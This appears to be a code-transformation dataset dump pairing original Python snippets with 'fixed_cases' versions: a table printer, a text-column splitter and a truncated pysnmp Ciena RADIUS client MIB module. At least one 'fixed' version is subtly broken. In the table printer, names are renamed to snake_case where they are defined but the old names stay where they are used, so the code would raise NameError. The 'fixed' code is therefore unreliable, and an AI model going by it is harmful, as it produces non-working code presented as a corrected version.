content
stringlengths
7
1.05M
fixed_cases
stringlengths
1
1.28M
#! python ''' a program that displays a list of lists in a well formatted tabular structure ''' tableData = [ ['apples', 'oranges', 'cherries', 'banana'], ['Alice', 'Bob', 'Carol', 'David'], ['dogs', 'cats', 'moose', 'goose'] ] def printTable(entries: list) -> None: colWidths = [0] * len(entries) # loop to determing the justification(padding) length for rowIndex in range(len(entries)): for word in entries[rowIndex]: if len(word) > colWidths[rowIndex]: colWidths[rowIndex] = len(word) # loop to render the entries in a tabular form for j in range(len(entries[0])): line = '' for i in range(len(entries)): line += (f'{entries[i][j].rjust(colWidths[i])} ') if i == len(entries) - 1: print(line) printTable(tableData)
""" a program that displays a list of lists in a well formatted tabular structure """ table_data = [['apples', 'oranges', 'cherries', 'banana'], ['Alice', 'Bob', 'Carol', 'David'], ['dogs', 'cats', 'moose', 'goose']] def print_table(entries: list) -> None: col_widths = [0] * len(entries) for row_index in range(len(entries)): for word in entries[rowIndex]: if len(word) > colWidths[rowIndex]: colWidths[rowIndex] = len(word) for j in range(len(entries[0])): line = '' for i in range(len(entries)): line += f'{entries[i][j].rjust(colWidths[i])} ' if i == len(entries) - 1: print(line) print_table(tableData)
with open("hightemp.txt") as f: pre, city = [], [] for line in f.read().split('\n')[:-1]: pre_i, city_i, _, _ = line.split() pre.append(pre_i) city.append(city_i) with open("col1.txt", 'w') as f1: f1.write('\n'.join(pre)) with open("col2.txt", 'w') as f2: f2.write('\n'.join(city))
with open('hightemp.txt') as f: (pre, city) = ([], []) for line in f.read().split('\n')[:-1]: (pre_i, city_i, _, _) = line.split() pre.append(pre_i) city.append(city_i) with open('col1.txt', 'w') as f1: f1.write('\n'.join(pre)) with open('col2.txt', 'w') as f2: f2.write('\n'.join(city))
# # PySNMP MIB module CIENA-CES-RADIUS-CLIENT-MIB (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CIENA-CES-RADIUS-CLIENT-MIB # Produced by pysmi-0.3.4 at Mon Apr 29 17:31:56 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") ConstraintsIntersection, SingleValueConstraint, ValueSizeConstraint, ValueRangeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "SingleValueConstraint", "ValueSizeConstraint", "ValueRangeConstraint", "ConstraintsUnion") cienaCesStatistics, = mibBuilder.importSymbols("CIENA-SMI", "cienaCesStatistics") CienaGlobalState, = mibBuilder.importSymbols("CIENA-TC", "CienaGlobalState") InetAddress, InetAddressType = mibBuilder.importSymbols("INET-ADDRESS-MIB", "InetAddress", "InetAddressType") ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup") Counter32, ObjectIdentity, Integer32, ModuleIdentity, Gauge32, NotificationType, IpAddress, TimeTicks, MibIdentifier, iso, Bits, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter64, Unsigned32 = mibBuilder.importSymbols("SNMPv2-SMI", "Counter32", "ObjectIdentity", "Integer32", "ModuleIdentity", "Gauge32", "NotificationType", "IpAddress", "TimeTicks", "MibIdentifier", "iso", "Bits", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter64", "Unsigned32") RowStatus, TruthValue, TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "RowStatus", "TruthValue", "TextualConvention", "DisplayString") cienaCesRadiusClientMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3)) cienaCesRadiusClientMIB.setRevisions(('2016-02-17 00:00', '2015-07-22 00:00', '2015-06-22 00:00', '2014-06-12 00:00', '2014-01-02 00:00', '2012-04-17 00:00', '2010-05-18 00:00',)) if mibBuilder.loadTexts: cienaCesRadiusClientMIB.setLastUpdated('201602170000Z') if mibBuilder.loadTexts: cienaCesRadiusClientMIB.setOrganization('Ciena Corp.') class RadiusString(TextualConvention, OctetString): status = 'current' displayHint = '255a' subtypeSpec = OctetString.subtypeSpec + ConstraintsUnion(ValueSizeConstraint(0, 0), ValueSizeConstraint(8, 64), ) cienaCesRadiusClientMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1)) cienaCesRadiusClient = MibIdentifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1)) cienaCesRadiusClientGlobal = MibIdentifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 1)) cienaCesRadiusClientServer = MibIdentifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2)) cienaCesRadiusUserLogin = MibIdentifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3)) cienaCesRadiusUserLoginGlobal = MibIdentifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 1)) cienaCesRadiusDot1xAuth = MibIdentifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 4)) cienaCesRadiusDot1xAuthGlobal = MibIdentifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 4, 1)) cienaCesRadiusDot1xAcct = MibIdentifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 5)) cienaCesRadiusDot1xAcctGlobal = MibIdentifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 5, 1)) cienaCesRadiusUserLoginAcct = MibIdentifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6)) cienaCesRadiusUserLoginAcctGlobal = MibIdentifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 1)) cienaCesRadiusClientMIBNotificationPrefix = MibIdentifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 2)) cienaCesRadiusClientMIBNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 2, 0)) cienaCesRadiusClientMIBConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 3)) cienaCesRadiusClientMIBCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 3, 1)) cienaCesRadiusClientMIBGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 3, 2)) cienaCesRadiusAdminState = MibScalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 1, 1), CienaGlobalState()).setMaxAccess("readwrite") if mibBuilder.loadTexts: cienaCesRadiusAdminState.setStatus('current') cienaCesRadiusOperState = MibScalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 1, 2), CienaGlobalState()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusOperState.setStatus('current') cienaCesRadiusClientTimeout = MibScalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 30)).clone(1)).setUnits('seconds').setMaxAccess("readwrite") if mibBuilder.loadTexts: cienaCesRadiusClientTimeout.setStatus('deprecated') cienaCesRadiusClientRetries = MibScalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 3)).clone(3)).setMaxAccess("readwrite") if mibBuilder.loadTexts: cienaCesRadiusClientRetries.setStatus('deprecated') cienaCesRadiusClientAuthKey = MibScalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 1, 5), RadiusString()).setMaxAccess("readwrite") if mibBuilder.loadTexts: cienaCesRadiusClientAuthKey.setStatus('deprecated') cienaCesRadiusClientAuthKeyUnset = MibScalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 1, 6), TruthValue()).setMaxAccess("readwrite") if mibBuilder.loadTexts: cienaCesRadiusClientAuthKeyUnset.setStatus('deprecated') cienaCesRadiusClientSearchType = MibScalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("cached", 1), ("priority", 2)))).setMaxAccess("readwrite") if mibBuilder.loadTexts: cienaCesRadiusClientSearchType.setStatus('deprecated') cienaCesRadiusClientServerTable = MibTable((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1), ) if mibBuilder.loadTexts: cienaCesRadiusClientServerTable.setStatus('deprecated') cienaCesRadiusClientServerEntry = MibTableRow((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1), ).setIndexNames((0, "CIENA-CES-RADIUS-CLIENT-MIB", "cienaCesRadiusClientServerIndex")) if mibBuilder.loadTexts: cienaCesRadiusClientServerEntry.setStatus('deprecated') cienaCesRadiusClientServerIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 8))) if mibBuilder.loadTexts: cienaCesRadiusClientServerIndex.setStatus('deprecated') cienaCesRadiusClientServerAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 2), DisplayString()).setMaxAccess("readcreate") if mibBuilder.loadTexts: cienaCesRadiusClientServerAddr.setStatus('deprecated') cienaCesRadiusClientServerResolvedAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 3), IpAddress()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusClientServerResolvedAddr.setStatus('deprecated') cienaCesRadiusClientServerPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 4), Integer32()).setMaxAccess("readcreate") if mibBuilder.loadTexts: cienaCesRadiusClientServerPriority.setStatus('deprecated') cienaCesRadiusClientServerAuthPort = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535)).clone(1812)).setMaxAccess("readcreate") if mibBuilder.loadTexts: cienaCesRadiusClientServerAuthPort.setStatus('deprecated') cienaCesRadiusClientServerRoundTripTime = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 6), TimeTicks()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusClientServerRoundTripTime.setStatus('deprecated') cienaCesRadiusClientServerAccessRequests = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 7), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusClientServerAccessRequests.setStatus('deprecated') cienaCesRadiusClientServerAccessRetransmissions = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 8), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusClientServerAccessRetransmissions.setStatus('deprecated') cienaCesRadiusClientServerAccessAccepts = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 9), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusClientServerAccessAccepts.setStatus('deprecated') cienaCesRadiusClientServerAccessRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 10), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusClientServerAccessRejects.setStatus('deprecated') cienaCesRadiusClientServerAccessChallenges = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 11), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusClientServerAccessChallenges.setStatus('deprecated') cienaCesRadiusClientServerMalformedAccessResponses = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 12), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusClientServerMalformedAccessResponses.setStatus('deprecated') cienaCesRadiusClientServerBadAuthenticators = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 13), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusClientServerBadAuthenticators.setStatus('deprecated') cienaCesRadiusClientServerPendingRequests = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 14), Gauge32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusClientServerPendingRequests.setStatus('deprecated') cienaCesRadiusClientServerTimeouts = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 15), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusClientServerTimeouts.setStatus('deprecated') cienaCesRadiusClientServerUnknownTypes = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 16), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusClientServerUnknownTypes.setStatus('deprecated') cienaCesRadiusClientServerPacketsDropped = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 17), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusClientServerPacketsDropped.setStatus('deprecated') cienaCesRadiusClientServerApplication = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 18), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("userLogin", 1), ("all", 2))).clone('all')).setMaxAccess("readcreate") if mibBuilder.loadTexts: cienaCesRadiusClientServerApplication.setStatus('deprecated') cienaCesRadiusClientServerStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 2, 1, 1, 19), RowStatus()).setMaxAccess("readcreate") if mibBuilder.loadTexts: cienaCesRadiusClientServerStatus.setStatus('deprecated') cienaCesRadiusUserLoginTimeout = MibScalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 30)).clone(1)).setUnits('seconds').setMaxAccess("readwrite") if mibBuilder.loadTexts: cienaCesRadiusUserLoginTimeout.setStatus('current') cienaCesRadiusUserLoginRetries = MibScalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 3)).clone(3)).setMaxAccess("readwrite") if mibBuilder.loadTexts: cienaCesRadiusUserLoginRetries.setStatus('current') cienaCesRadiusUserLoginAuthKey = MibScalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 1, 3), RadiusString()).setMaxAccess("readwrite") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAuthKey.setStatus('current') cienaCesRadiusUserLoginSearchType = MibScalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("cached", 1), ("priority", 2)))).setMaxAccess("readwrite") if mibBuilder.loadTexts: cienaCesRadiusUserLoginSearchType.setStatus('current') cienaCesRadiusUserLoginAuthSecret = MibScalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 1, 5), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 259))).setMaxAccess("readwrite") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAuthSecret.setStatus('current') cienaCesRadiusUserLoginTable = MibTable((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2), ) if mibBuilder.loadTexts: cienaCesRadiusUserLoginTable.setStatus('current') cienaCesRadiusUserLoginEntry = MibTableRow((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1), ).setIndexNames((0, "CIENA-CES-RADIUS-CLIENT-MIB", "cienaCesRadiusUserLoginIndex")) if mibBuilder.loadTexts: cienaCesRadiusUserLoginEntry.setStatus('current') cienaCesRadiusUserLoginIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 8))) if mibBuilder.loadTexts: cienaCesRadiusUserLoginIndex.setStatus('current') cienaCesRadiusUserLoginResolvedInetAddrType = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 2), InetAddressType()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginResolvedInetAddrType.setStatus('current') cienaCesRadiusUserLoginResolvedInetAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 3), InetAddress()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginResolvedInetAddress.setStatus('current') cienaCesRadiusUserLoginAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 4), DisplayString()).setMaxAccess("readcreate") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAddr.setStatus('current') cienaCesRadiusUserLoginPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 5), Integer32()).setMaxAccess("readcreate") if mibBuilder.loadTexts: cienaCesRadiusUserLoginPriority.setStatus('current') cienaCesRadiusUserLoginAuthPort = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535)).clone(1812)).setMaxAccess("readcreate") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAuthPort.setStatus('current') cienaCesRadiusUserLoginClearStatistics = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 7), TruthValue()).setMaxAccess("readwrite") if mibBuilder.loadTexts: cienaCesRadiusUserLoginClearStatistics.setStatus('current') cienaCesRadiusUserLoginRoundTripTime = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 8), TimeTicks()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginRoundTripTime.setStatus('current') cienaCesRadiusUserLoginRequests = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 9), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginRequests.setStatus('current') cienaCesRadiusUserLoginRetransmissions = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 10), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginRetransmissions.setStatus('current') cienaCesRadiusUserLoginAccessAccepts = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 11), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAccessAccepts.setStatus('current') cienaCesRadiusUserLoginAccessRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 12), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAccessRejects.setStatus('current') cienaCesRadiusUserLoginAccessChallenges = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 13), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAccessChallenges.setStatus('current') cienaCesRadiusUserLoginAccountingResponses = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 14), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAccountingResponses.setStatus('current') cienaCesRadiusUserLoginMalformedResponses = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 15), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginMalformedResponses.setStatus('current') cienaCesRadiusUserLoginBadAuthenticators = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 16), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginBadAuthenticators.setStatus('current') cienaCesRadiusUserLoginTimeouts = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 17), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginTimeouts.setStatus('current') cienaCesRadiusUserLoginUnknownTypes = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 18), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginUnknownTypes.setStatus('current') cienaCesRadiusUserLoginPacketsDropped = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 19), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginPacketsDropped.setStatus('current') cienaCesRadiusUserLoginStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 3, 2, 1, 20), RowStatus()).setMaxAccess("readcreate") if mibBuilder.loadTexts: cienaCesRadiusUserLoginStatus.setStatus('current') cienaCesRadiusUserLoginAcctAdminState = MibScalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("disabled", 1), ("enabled", 2)))).setMaxAccess("readwrite") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctAdminState.setStatus('current') cienaCesRadiusUserLoginAcctTimeout = MibScalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 30)).clone(1)).setUnits('seconds').setMaxAccess("readwrite") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctTimeout.setStatus('current') cienaCesRadiusUserLoginAcctRetries = MibScalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 3)).clone(3)).setMaxAccess("readwrite") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctRetries.setStatus('current') cienaCesRadiusUserLoginAcctAuthKey = MibScalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 1, 4), RadiusString()).setMaxAccess("readwrite") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctAuthKey.setStatus('current') cienaCesRadiusUserLoginAcctSearchType = MibScalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("cached", 1), ("priority", 2)))).setMaxAccess("readwrite") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctSearchType.setStatus('current') cienaCesRadiusUserLoginAcctAuthSecret = MibScalar((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 1, 6), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 259))).setMaxAccess("readwrite") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctAuthSecret.setStatus('current') cienaCesRadiusUserLoginAcctTable = MibTable((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2), ) if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctTable.setStatus('current') cienaCesRadiusUserLoginAcctEntry = MibTableRow((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1), ).setIndexNames((0, "CIENA-CES-RADIUS-CLIENT-MIB", "cienaCesRadiusUserLoginAcctIndex")) if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctEntry.setStatus('current') cienaCesRadiusUserLoginAcctIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 8))) if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctIndex.setStatus('current') cienaCesRadiusUserLoginAcctResolvedInetAddrType = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 2), InetAddressType()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctResolvedInetAddrType.setStatus('current') cienaCesRadiusUserLoginAcctResolvedInetAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 3), InetAddress()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctResolvedInetAddress.setStatus('current') cienaCesRadiusUserLoginAcctAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 4), DisplayString()).setMaxAccess("readcreate") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctAddr.setStatus('current') cienaCesRadiusUserLoginAcctPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 5), Integer32()).setMaxAccess("readcreate") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctPriority.setStatus('current') cienaCesRadiusUserLoginAcctAuthPort = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535)).clone(1812)).setMaxAccess("readcreate") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctAuthPort.setStatus('current') cienaCesRadiusUserLoginAcctClearStatistics = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 7), TruthValue()).setMaxAccess("readwrite") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctClearStatistics.setStatus('current') cienaCesRadiusUserLoginAcctRoundTripTime = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 8), TimeTicks()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctRoundTripTime.setStatus('current') cienaCesRadiusUserLoginAcctRequests = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 9), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctRequests.setStatus('current') cienaCesRadiusUserLoginAcctRetransmissions = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 10), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctRetransmissions.setStatus('current') cienaCesRadiusUserLoginAcctAccessAccepts = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 11), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctAccessAccepts.setStatus('current') cienaCesRadiusUserLoginAcctAccessRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 12), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctAccessRejects.setStatus('current') cienaCesRadiusUserLoginAcctAccessChallenges = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 13), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctAccessChallenges.setStatus('current') cienaCesRadiusUserLoginAcctAccountingResponses = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 14), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctAccountingResponses.setStatus('current') cienaCesRadiusUserLoginAcctMalformedResponses = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 15), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctMalformedResponses.setStatus('current') cienaCesRadiusUserLoginAcctBadAuthenticators = MibTableColumn((1, 3, 6, 1, 4, 1, 1271, 2, 3, 3, 1, 1, 6, 2, 1, 16), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cienaCesRadiusUserLoginAcctBadAuthenticators.setStatus('current') cienaCesRadiusUserLoginAcctTimeouts = MibTableColumn((1, 3, 6, 1, 4, 1, 